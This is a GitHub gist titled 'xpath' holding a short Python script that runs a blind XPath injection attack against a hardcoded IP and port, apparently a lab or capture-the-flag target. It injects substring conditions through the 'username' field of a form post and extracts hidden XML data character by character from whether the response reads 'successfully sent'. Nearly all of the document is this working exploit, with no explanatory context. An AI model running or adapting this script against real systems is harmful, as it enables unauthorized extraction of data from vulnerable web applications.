Skip to content

Instantly share code, notes, and snippets.

@sharpicx
Created September 25, 2024 17:27
Show Gist options
  • Save sharpicx/832c97307042d5d4336866fd3098f4ef to your computer and use it in GitHub Desktop.
Save sharpicx/832c97307042d5d4336866fd3098f4ef to your computer and use it in GitHub Desktop.
xpath
import requests
import string
import time
from requests.exceptions import ConnectionError
from pwn import log
ext = ""
i = 1
while True:
try:
for str in string.printable:
S = requests.Session()
payload = {
"username": f"' or substring(/*[1]/*[1]/*[2],{i},1)='{str}' and ''='",
"msg": ""
}
response = S.post("http://94.237.59.63:40322/index.php", data=payload)
if 'successfully sent' in response.text:
ext += str
i += 1
log.info(ext)
break
except requests.exceptions.ConnectionError:
log.warn(f"retrying...")
time.sleep(1)
except Exception as e:
log.error("An unexpected error occurred:", str(e))
break
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment